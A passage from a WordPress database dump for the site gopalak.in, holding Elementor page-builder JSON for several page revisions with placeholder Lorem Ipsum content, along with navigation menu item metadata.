here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7738,1387,'_elementor_page_assets','a:0:{}'),(7740,1388,'_elementor_edit_mode','builder'),(7741,1388,'_elementor_template_type','wp-page'),(7742,1388,'_elementor_version','3.7.6'),(7743,1388,'_wp_page_template','elementor_canvas'),(7744,1388,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7745,1388,'_elementor_page_assets','a:0:{}'),(7747,1389,'_elementor_edit_mode','builder'),(7748,1389,'_elementor_template_type','wp-page'),(7749,1389,'_elementor_version','3.7.6'),(7750,1389,'_wp_page_template','elementor_canvas'),(7751,1389,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7752,1389,'_elementor_page_assets','a:0:{}'),(7763,1391,'_menu_item_type','post_type'),(7764,1391,'_menu_item_menu_item_parent','0'),(7765,1391,'_menu_item_object_id','403'),(7766,1391,'_menu_item_object','page'),(7767,1391,'_menu_item_target',''),(7768,1391,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7769,1391,'_menu_item_xfn',''),(7770,1391,'_menu_item_url',''),(7771,1391,'_menu_item_orphaned','1663739778'),(7772,1392,'_menu_item_type','post_type'),(7773,1392,'_menu_item_menu_item_parent','0'),(7774,1392,'_menu_item_object_id','11'),(7775,1392,'_menu_item_object','page'),(7776,1392,'_menu_item_target',''),(7777,1392,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7778,1392,'_menu_item_xfn',''),(7779,1392,'_menu_item_url',''),(7780,1392,'_menu_item_orphaned','1663739778'),(7781,1393,'_menu_item_type','custom'),(7782,1393,'_menu_item_menu_item_parent','0'),(7783,1393,'_menu_item_object_id','1393'),(7784,1393,'_menu_item_object','custom'),(7785,1393,'_menu_item_target',''),(7786,1393,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7787,1393,'_menu_item_xfn',''),(7788,1393,'_menu_item_url','https://gopalak.in/home/'),(7790,1394,'_menu_item_type','custom'),(7791,1394,'_menu_item_menu_item_parent','0'),(7792,1394,'_menu_item_object_id','1394'),(7793,1394,'_menu_item_object','custom'),(7794,1394,'_menu_item_target',''),(7795,1394,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7796,1394,'_menu_item_xfn',''),(7797,1394,'_menu_item_url','https://gopalak.in/shop/'),(7812,1395,'_elementor_edit_mode','builder'),(7813,1395,'_elementor_template_type','wp-page'),(7814,1395,'_elementor_version','3.7.6'),(7815,1395,'_wp_page_template','elementor_canvas'),(7816,1395,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 